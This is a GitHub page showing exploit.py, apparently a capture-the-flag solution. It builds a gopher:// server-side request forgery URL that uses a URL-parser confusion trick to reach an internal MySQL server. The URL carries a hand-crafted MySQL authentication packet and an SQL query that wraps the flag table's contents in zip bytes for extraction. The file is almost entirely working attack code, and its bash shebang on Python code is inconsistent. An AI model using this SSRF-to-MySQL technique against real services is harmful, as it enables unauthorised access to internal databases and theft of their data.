-
Notifications
You must be signed in to change notification settings - Fork 40
/
Copy pathexploit.py
51 lines (34 loc) · 1.35 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#!/bin/bash
import struct
import zip_tools
from binascii import hexlify
# make a 100 dummy character string
# we will rpad flag to 100 characters (this is needed since actual flag length is unknown, you
# could just bruteforce it tohugh i guess...)
flag_dummy = b"B"*100
payload = zip_tools.create_zip(b"gimme_flag", flag_dummy)
# print(''.join(map(chr,payload)))
# exit()
prefix = bytes(payload.split(flag_dummy)[0])
suffix = bytes(payload.split(flag_dummy)[1])
sql_cmd = b"select concat(cast(0x" + hexlify(prefix) + b" as binary), rpad(flag, 100, 'A'), cast(0x" + hexlify(suffix) + b" as binary)) from flag.flag-- -"
auth = bytearray([
0x48, 0x0, 0x0, # length
0x1, # seqid
0x85, 0xa6, 0x3f, 0x20, 0, 0, 0, 0x1, 0x21, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0
] + list(b'm4st3r_ov3rl0rd') + [ # mysql user
0, 0, # pass length & pass
] + list(b'mysql_native_password') + [
0, 0,
])
def make_cmd(cmd):
length = struct.pack("<I", len(cmd) + 2)[:3]
return length + bytearray([
0x0, # seqid
0x3, # select query
]) + cmd
def encode(s):
return ''.join(map(lambda x: "%{:02x}".format(x), list(s)))
print((b"gopher://foo@[cafebabe.cf]@yolo.com:3306/A" + bytes(encode(auth + make_cmd(sql_cmd) + b"FOOOOOOOOOOOOBAR"),"utf-8")).decode())